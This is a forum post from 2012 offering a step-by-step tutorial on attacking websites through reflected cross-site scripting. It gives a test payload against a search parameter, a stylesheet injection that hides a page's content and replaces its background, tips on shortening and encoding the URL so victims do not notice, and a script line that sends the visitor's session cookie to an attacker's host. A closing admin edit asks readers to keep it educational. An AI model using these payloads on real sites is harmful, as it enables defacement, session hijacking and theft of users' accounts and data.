LebGeeks
You are not logged in.
- Topics: Active • Unanswered
#1 January 15 2012
- shekvaL
- Member
[Tutorial] Attacking Websites on vulnerable Web Application using XSS.
Hello LebGeeks,
I know XSS vulnerabilities are quite old, but I am sure that not everybody knows about it,
the tutorial is for educational purposes, I'm not responsible for anything You might do because of the tutorial And i didn't really injected something to the websites in the tutorial examples so it is legal what i did.
XSS:
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications that enables attackers to inject client-side script into Web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy. Cross-site scripting carried out on websites accounted for roughly 80.5% of all security vulnerabilities documented by Symantec as of 2007.[1] Their effect may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data handled by the vulnerable site and the nature of any security mitigation implemented by the site's owner
Key Concepts of XSS:
1-XSS is a Web-based attack performed on vulnerable Web application
2-In XSS attacks, the victim is the user and not the application
3-In XSS attacks, malicious content is delivered to users using JavaScript
For more info read the introduction of it @wikipedia : http://en.wikipedia.org/wiki/Cross-site_scripting
Exploit Examples:
1-Non-persistent:
Alice often visits a particular website, which is hosted by Bob. Bob's website allows Alice to log in with a username/password pair and stores sensitive data, such as billing information.
Mallory observes that Bob's website contains a reflected XSS vulnerability.
Mallory crafts a URL to exploit the vulnerability, and sends Alice an email, enticing her to click on a link for the URL under false pretenses. This URL will point to Bob's website (either directly or through an iframe or ajax), but will contain Mallory's malicious code, which the website will reflect.
Alice visits the URL provided by Mallory while logged into Bob's website.
The malicious script embedded in the URL executes in Alice's browser, as if it came directly from Bob's server (this is the actual XSS vulnerability). The script can be used to send Alice's session cookie to Mallory. Mallory can then use the session cookie to steal sensitive information available to Alice (authentication credentials, billing info, etc.) without Alice's knowledge.
Persistent attack:
Mallory posts a message with malicious payload to a social network.
When Bob reads the message, Mallory's XSS steals Bob's cookie.
Mallory can now hijack Bob's session and impersonate Bob
to check if a website is vulnerable to xss:
when we find any input method in a website especially search forms and guestbooks ..
Our victim is <victim>
we go the search page : http://www.<victim>/_NewsSearch.php?Keyword=
it is normal , but now we try to test if its vulnerable
we add
<script>alert(1)</script>to the URL , we now have
http://www.<victim>/_NewsSearch.php?Keyword=<script>alert(1)</script>
okay then the website is vulnerable to XSS.
What We are going to do is to upload the code below to your website as *.css and edit your background image link by one made by you (edit the color codes as you like):
<style>BODY {SCROLLBAR-FACE-COLOR: #000000; SCROLLBAR-HIGHLIGHT-COLOR: #000000; SCROLLBAR-SHADOW-COLOR: darkgray; SCROLLBAR-3DLIGHT-COLOR: #eeeeee; SCROLLBAR-ARROW-COLOR: #000000; SCROLLBAR-TRACK-COLOR: gray; SCROLLBAR-DARKSHADOW-COLOR: #000000}
A:link {
COLOR: darkblue; TEXT-DECORATION: none
}
A:visited {
COLOR: #000088; TEXT-DECORATION: none
}
A:hover {
COLOR: #000000
}
body, td, th {
color: #000000;
}
table, p, td, tr, div
{
visibility:hidden;
}
body {
background-color: #000000;
background-image:url('http://.../YOUR IMAGE LINK.jpg');
background-repeat:no-repeat;
background-position:top;}</style>i will use a website that i have access to its ftp information, you could simply use your own website or any free web hosting
just edit and upload the file ( *.css) and the image to the website you own.
and put this simple code in the url
<link href=http://yourwebsite..../code.css type=text/css rel=stylesheet>to be like
www.<victim>/_NewsSearch.php?Keyword=<link href=http://yourwebsite..../code.css type=text/css rel=stylesheet>you could also use bit.ly to shorten your url, and use : http://meyerweb.com/eric/tools/dencoder/ , so you can decode and encode your URL so nobody would notice what you did there.
The malicious thing to do is to Steal victims cookies ,
use it without the spaces
<Script>location.href="http://www.yourwebsite.com/code.php?id="+d o c u m e n t.c o o k i e</Script>you can use the code provided by http://whiteacid.org or i could provide you with a ready edited one for you.
Finally please be aware of XSS injections , you can simply Add to you Firefox an Add-on named noscript and disable java for more security of your browsing
Thank You.
Jawad
<admin edit: please keep it educational, don't use real-life victims, especially not government websites>
